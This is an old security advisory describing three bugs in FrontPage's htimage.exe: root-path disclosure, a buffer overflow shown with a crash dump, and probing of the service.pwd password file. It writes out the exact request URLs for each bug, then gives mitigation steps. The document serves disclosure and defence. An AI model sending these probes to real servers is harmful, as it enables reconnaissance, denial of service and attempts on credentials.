COMMAND
htimage.exe & imagemap.exe
SYSTEMS AFFECTED
FrontPage Server Extensions
PROBLEM
Following is based on Legion2000 - Russian Security Team advisory
and it was discovered by Narrow. CERN Image Map Dispatcher
(/cgi-bin/htimage.exe) comes by default with FrontPage. Narrow
found three bugs in "htimage.exe":
1) Gives us the full path to the root directory
2) Simple buffer overflow
3) Allow us to access files.
1) Gives us the full path to the root directory
===============================================
As said before, the first bug gives us the full path to the root
directory. It was tested against some servers, all where
vulnerable! Tested/Vulnerable FP Servers: 3.0.2.926
(FrontPage'98), 3.0.2.1706, 4.0.2.2717, 2.0.1.927, 3.0.2.926,
3.0.2.1105, 3.0.2.1330, 3.0.2.1117 (All Windows based web servers
are vulnerable if we have premission to execute "htimage.exe" + If
"htimage.exe" exist).
To test this vulnerability we need "htimage.exe" in our "cgi-bin"
directory (it's installed by default) and premission to execute
it. That's why only Windows is vulnerable, Unix based systems
can't execute "*.exe" files. If we access "htimage.exe" using
our favorite web browser like:
http://server/cgi-bin/htimage.exe/linux?0,0
we get this error:
Error
Error calling HTImage:
Picture config file not found, tried the following:
q:/hidden_directory_because_of_the_script_kiddies/webroot/linux
/linux
Now we know that the path to the root directory is
"q:/hidden_directory_because_of_the_script_kiddies/webroot/".
2) Simple buffer overflow
=========================
As said before, simple buffer overflow. Tested against
"Microsoft-PWS-95/2.0" and "FrontPage-PWS32". Tested / Vulnerable
OS: Windows'95/98 "htimage.exe" buffer overflows if we access it
like: http://server/cgi-bin/htimage.exe/<741 A's>?0,0.
HTIMAGE caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
0EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246
EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4
ECX=0054015c DS=013f ESI=005401a0 FS=3467
EDX=bff76648 ES=013f EDI=00540184 GS=0000
Bytes at CS:EIP:
Stack dump:
bff7663c 00540184 0063fe28 005401a0 0054015c 00540290 bff76648 0063fe28
0054016c bff85a0a 00540184 0063fe28 005401a0 0054015c 41414141 0054034c
<Server still running> + <500 Server Error> First remote
FrontPage exploit?
3) Allow us to access files
===========================
It's not a serious bug. Using "htimage.exe" we can access files
on server, but we can't read them. Accessing "htimage.exe" like:
http://server/cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0
outputs:
Error
Error calling HTImage:
HTImage.c: Syntax error at line 1 Bad field name, expecting 'default', 'rectangle', 'circle' or
'polygon' (got an alphanumeric string)
Accessing "/_vti_pvt/service.pwd" outputs : 403 Forbidden
SOLUTION
FrontPage Server Extensions versions prior to FrontPage 2000 ship
with files called imagemap.exe and htimage.exe, which are
server-side NCSA and CERN compliant components that support
server-side image maps. If attacked, these files are vulnerable
to buffer overruns, exploits of cross site scripting, and access
to drive path and file information. ALL WEB PRESENCE PROVIDERS
ON BOTH THE UNIX AND WINDOWS PLATFORMS SHOULD DELETE ALL
OCCURRENCES OF THESE FILES (imagemap.exe and htimage.exe) ON ALL
WEB SERVERS. FrontPage defaults to using client side image maps.
Removing the files will have minimal or no impact to end user
functionality.
FrontPage 2000 defaults to restricting uploads of files to
executable folders. The server side setting is
NoExecutableCgiUpload:1. In order to control future uploads of
the image map files or any other files to executable folders on
the server, configure the NoExecutableCgiUpload setting. This
server side setting is described further in the FrontPage 2000
Server Extensions resource kit at:
http://officeupdate.microsoft.com/frontpage/wpp/serk/apndx03.htm#apndx03.doc-1079